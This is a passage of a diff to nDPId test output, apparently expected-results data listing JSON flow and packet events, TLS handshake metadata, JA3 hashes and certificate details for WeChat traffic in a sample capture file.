+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167401063,"flow_last_seen":1492167401063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167401063,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1492167440370,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167440370,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9gAAAEC8bPAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167440370,"flow_last_seen":1492167440370,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492167440370,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -158,129 +158,129 @@ 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1492167449288,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167449288,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 